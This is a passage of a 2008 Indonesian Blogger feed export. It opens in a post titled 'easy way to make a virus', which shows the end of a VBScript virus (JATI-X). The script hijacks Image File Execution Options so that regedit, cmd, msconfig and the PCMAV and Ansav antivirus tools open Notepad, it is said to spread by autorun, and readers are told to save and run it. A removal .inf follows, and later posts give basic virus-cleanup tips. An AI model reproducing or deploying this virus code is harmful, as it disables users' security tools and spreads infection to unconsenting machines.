Options\Ansav.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”&lt;br /&gt;‘Bonus&lt;br /&gt;Msgbox”maaf anda terkena virus jati”&lt;br /&gt;if check &lt;&gt; 1 then&lt;br /&gt;Wscript.sleep 200000&lt;br /&gt;end if&lt;br /&gt;loop while check &lt;&gt; 1&lt;br /&gt;set sd = createobject(”Wscript.shell”)&lt;br /&gt;sd.run windowpath &amp; “\explorer.exe /e,/select, ” &amp; Wscript.ScriptFullname&lt;br /&gt;Setelah Anda menempatkan kode tersebut klik FILE &gt; SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama jatims32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan JATI-X.VBS di komputer Anda.&lt;br /&gt;Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :&lt;br /&gt; &lt;br /&gt;Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.&lt;br /&gt;Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Misalnya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)&lt;br /&gt;NOTE: Untuk membersihkan JATI-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.&lt;br /&gt;Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama JATI-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :&lt;br /&gt;[Version]&lt;br /&gt;Signature=”$Chicago$”&lt;br /&gt;Provider=Fariskhi&lt;br /&gt;[DefaultInstall]&lt;br /&gt;AddReg=UnhookRegKey&lt;br /&gt;DelReg=del&lt;br /&gt;[UnhookRegKey]&lt;br /&gt;HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”&lt;br /&gt;[del]&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu&lt;br /&gt;HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption&lt;br /&gt;HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText&lt;br /&gt;HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger&lt;br /&gt;Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : JATIxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-6117538238367773620?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/6117538238367773620/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/cara-mudah-buat-virus.html#comment-form' title='7 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/6117538238367773620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/6117538238367773620'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/cara-mudah-buat-virus.html' title='CARA MUDAH BUAT VIRUS'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-2851418495625092447</id><published>2008-12-05T02:31:00.000+07:00</published><updated>2008-12-05T02:32:01.733+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MEMBUNUH VIRUS DIKOMPI'/><title type='text'>MEMBASMI VIRUS DIKOMPUTER</title><content type='html'>Wah ketemu lg nih.&lt;br /&gt;kali ini aku akan membahas ttg cara membasmi virus dikompi.&lt;br /&gt;sebelum kita mulai sebaiknya lakukan langkah ke1 spt pd posting ke1 yg udh aku jelaskan dg tujuan menelanjangi virus yg sembunyi.&lt;br /&gt;# langkah berikut menghentikan program aktiv sivirus caranya tekan ctrl+alt+delete.&lt;br /&gt;perhatikan windows yg muncul yaitu task manager. lalu klik process kmdian klik username.&lt;br /&gt;lihat program yg sdg berjalan kalo ada yg mencurigakan spt wscript segera klik terus klik end proces. berarti virus udh ga jln. jgn dimatikan yg system atau service karena bs kompi kita hang.&lt;br /&gt;ada jg program yg fungsinya sama spt task manager yaitu proces explorer silahkan cari pake keyword tsb lewat google utk download.&lt;br /&gt;* langkah berikutnya mematikan virus distart up, caranya klik start, run, ketik msconfig, trs enter. stlh windows ms config muncul klik start up, kmdian dissable all. berarti virus tdk akan lari distart up.  &lt;br /&gt;program yg lain yg fungsinya sama yaitu advance windows care, download aja diìnternet. cari pake google.&lt;br /&gt;* langkah selanjutnya mematikan virus diregistry. sblm hal ini dilakukan anda hrs tau dulu mana file virusnya caranya lihat ditiap drive misalnya drive d biasanya virus mgnkan autorun jd buka autorun dg notepad kmdian baca dia lari kefile apa. brarti itulah file virus. utk mematikan diregistry caranya: klik start, run, regedit. stlh window regedit muncul klik edit, find, ketik nama file virus td. terus delete.&lt;br /&gt;skr komputer kita aman dari virus. untuk memastikan lg coba buka file windows dan kalo msh ada virusnya lsg hapus aja. cari jg disystem 32 krn kadang jg virus ada disana.&lt;br /&gt;wah skr anda sdh bs jd dokter komputer deh..&lt;br /&gt;eh jgn bangga dulu krn kadang virus jg mengeblok task manager, msconfig, dan regedit. jd gmn donk?&lt;br /&gt;tunggu posting saya berikutnya ttg script utk menjalankan task manager, msconfig dan regedit yg diblok virus..&lt;br /&gt;oke ikuti terus blog ini krn insyaalloh bermanfaat.&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-2851418495625092447?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/2851418495625092447/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/membasmi-virus-dikomputer.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/2851418495625092447'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/2851418495625092447'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/membasmi-virus-dikomputer.html' title='MEMBASMI VIRUS DIKOMPUTER'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-7495560365271171528</id><published>2008-11-30T15:08:00.000+07:00</published><updated>2008-11-30T15:10:07.610+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cara Mengetahui file virus.'/><title type='text'>LANJUTAN POSTING KE1</title><content type='html'>setelah langkah 1 dan 2 dilaksanakan brarti virus tdk akan lsg jalan dikomputer kita.&lt;br /&gt;tp file virus msh ada flash disk kita. jd kalo kita salah klik bisa2 virus menyebar dikompi.&lt;br /&gt;jd kita lakukan langkah ke3:&lt;br /&gt;3. mengenali file virus caranya 》sblm anda kelangkah 3 pastikan langkah 1 dan 2 sdh dilakukan, sekarang buka flashdisknya dikompi 》klik view》detail.&lt;br /&gt;lihat pada kolom file type. jika file kita ms.word, ms. excel atau ms.pwr point tapi di file type berubah jd aplication &lt;br /&gt; berarti file kita terinfeksi virus》lihat extensinya bukan doc, xls atau ppt tapi mjd exe. jika kamu tdk punya antivirus/udh out date maka kamu hrs menghapus file terinfeksi tsb dg cara》klik kiri 1x tekan shift+delete.&lt;br /&gt;yah hilang deh filenya?..&lt;br /&gt;iya tp kan kompi kita aman. mendingan file ada apa kompi kena virus?&lt;br /&gt;sebenarnya ada beberapa antivirus yg dpt membetulkan file yg terinfeksi contohnya pcmav dan ansav tp jika virus itu baru dan tdk ada didatabasenya maka kompi pasti terinfeksi.&lt;br /&gt;jd pastikan file itu dihapus.&lt;br /&gt;sebenarnya bs dengan didebug tp kalo kita ga ngerti jg percuma.&lt;br /&gt;oh iya file virus jg bisa berextensi vbs, jd kalo ada file mencurigakan terhiden spt k4l0n6.vbs segeralah dihapus. insyaalloh kompimu tdk akan terinfeksi virus dari flashdisk.&lt;br /&gt;terus jgn beli cd/dvd bajakan bs jd sdh terinfeksi. karena langkah 1,2 dan 3 tdk mempan utk cd dan internet jd tetap harus ada antivirusnya. &lt;br /&gt;lain waktu saya akan posting cara membersihkan virus dari komputer. oke.. terus ikuti blog ini. dan jgn lupa kritik dan saranya di post kekoment ya!!...&lt;br /&gt;daag...;-):-)&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-7495560365271171528?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/7495560365271171528/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/11/lanjutan-posting-ke1.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7495560365271171528'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7495560365271171528'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/11/lanjutan-posting-ke1.html' title='LANJUTAN POSTING KE1'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-1300935508636618530</id><published>2008-11-30T13:20:00.003+07:00</published><updated>2008-11-30T14:25:53.041+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Menangkal penyebaran virus diflash disk'/><title type='text'>PENGERTIAN VIRUS</title><content type='html'>Virus komputer adalah sebuah program yang sengaja dibuat dengan maksud untuk merusak sebuah program pada komputer target, program ini menyebar dan menginfeksi&lt;br /&gt;komputer tanpa diketahui pemiliknya.&lt;br /&gt;Bagaimana virus menginfeksi?&lt;br /&gt;ada beberapa cara untuk menginfeksi :&lt;br /&gt;1. lewat media penyimpanan data spt disket, flashdisk maupun cd/dvd.&lt;br /&gt;2. lewat jaringan baik lokal (LAN) maupun internet.&lt;br /&gt;khusus diinternet virus dpt menyebar lewat email, program yg siap didownload maupun sengaja disisipkan dg cara masuk keweb (dihack) kemudian ditanam diserver.&lt;br /&gt;3. lewat alat komunikasi handphone yg dpt mudah bertukar data.&lt;br /&gt;khusus pd handphone bs menyebar lewat bluethoot, infrared, maupun MMS.&lt;br /&gt;Jika melihat cara menyebarnya maka anda hrs berhati hati ketika akan mengambil, membuka, mengkopy maupun mendownload file, program maupun aplikasi &lt;br /&gt;lewat media tersebut.&lt;br /&gt;Terus gimana dong kalo tiap hari kita hrs menggunakan media tsb utk bekerja maupun belajar?&lt;br /&gt;Anda ga perlu setakut itu.&lt;br /&gt;Klo anda kurang paham ttg program komputer, instal aja antivirus. byk antivirus yg dpt didownload gratis diinternet. atau cari yg berkualìtas lebih tinggal transaksi aja diinternet.&lt;br /&gt;Wah kalo cm itu mah semua jg tau.. ngapain posting spt itu?&lt;br /&gt;okedeh kalo kamu pingin tau yg lebih sediakan bunga 7 rupa, kemenyan, ayam cemani... (emangnya mau jd dukun?)&lt;br /&gt;just kidding...&lt;br /&gt;oke skr kita melihat tanda tanda virus pd media penyimpan data kita. langkah2nya:&lt;br /&gt;1. klik kanan start, explorer, tools, folder option, view, kemudian klik show hidden file dan hilangkan checklist pd kolom hide extension for known file types dan kolom hide protected operating system file. 》langkah ini bertujuan membuka/memperlihatkan file yg tersembunyi krn biasanya virus dlm keadaan tersembunyi. jd langkah ini utk membuka topeng sivirus.&lt;br /&gt;2. buatlah autorun.inf bayangan pd media penyimpanan data. karena virus menyebar otomatis lewat program ini. caranya buka flashdisk/disket klik kanan new, folder.  beri nama autorun.inf terus buka foldernya dan buat folder baru lg tp beri nama dg huruf arial unicode, cara mencari hruf arial unicode 》buka ms word, klik insert, symbol terus cari arial unicode hrfnya spt jepang, klik insert kemudian copy huruf tsb. trs kamu buka folder yg didlm folder autorun.inf  dan kasih nama dg hrf arial unicode td. cara pastenya tekan ctrl+v  skr jd deh autorun.inf bayangan. kmdian folder td kita hidden spy ga dihapus sama org yg pinjam caranya klik kanan pd folder, properties,hidden》》&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-1300935508636618530?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/1300935508636618530/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/11/pengertian-virus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/1300935508636618530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/1300935508636618530'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/11/pengertian-virus.html' title='PENGERTIAN VIRUS'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry></feed>
